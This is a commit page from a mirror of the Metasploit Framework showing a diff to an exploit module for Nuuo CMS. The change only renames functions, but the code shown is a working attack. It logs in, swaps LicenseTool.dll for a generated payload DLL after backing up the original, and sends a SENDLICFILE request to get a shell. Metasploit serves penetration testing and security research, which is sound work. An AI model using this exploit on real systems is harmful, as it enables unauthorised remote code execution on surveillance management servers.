infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update nuuo_cms_fu.rb

GSoC/Meterpreter_Web_Console
Pedro Ribeiro 2019-01-22 12:45:47 +07:00 committed by GitHub
parent 0685ebed76
commit 4e1d79ac4b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/windows/nuuo/nuuo_cms_fu.rb
View File

@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
login
nucs_login
if @session == nil
if @nucs_session == nil
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
end
@ -83,18 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = download_file("LicenseTool.dll")
upload_file(@dll, dll_data)
dll_data = nucs_download_file("LicenseTool.dll")
nucs_upload_file(@dll, dll_data)
print_status("Uploading payload...")
upload_file("LicenseTool.dll", generate_payload_dll)
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
print_status("Sleeping 15 seconds...")
sleep 15
print_status("Sending SENDLICFILE request, shell incoming!")
license_data = rand_text_alpha(50..350)
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
"Content-Length: " + license_data.length.to_s], license_data)
end
end